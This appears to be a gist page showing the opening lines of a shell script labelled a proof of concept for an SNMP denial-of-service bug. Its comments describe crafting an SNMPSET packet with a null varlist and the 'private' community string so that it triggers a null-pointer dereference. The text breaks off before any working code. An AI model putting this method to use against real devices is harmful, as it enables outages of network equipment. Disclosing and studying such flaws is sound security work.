View snmp_ddos_ipttl.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
############### PoC for SNMP DDoS vulnerability ############### | |
# null-pointer-ref during handle SNMP requeset | |
# craft an SNMPSET packet with NULL varlist data | |
#SEQUENCE (3 elem) | |
# INTEGER 1 | |
# OCTET STRING (7 byte) private | |
# [3] (4 elem) |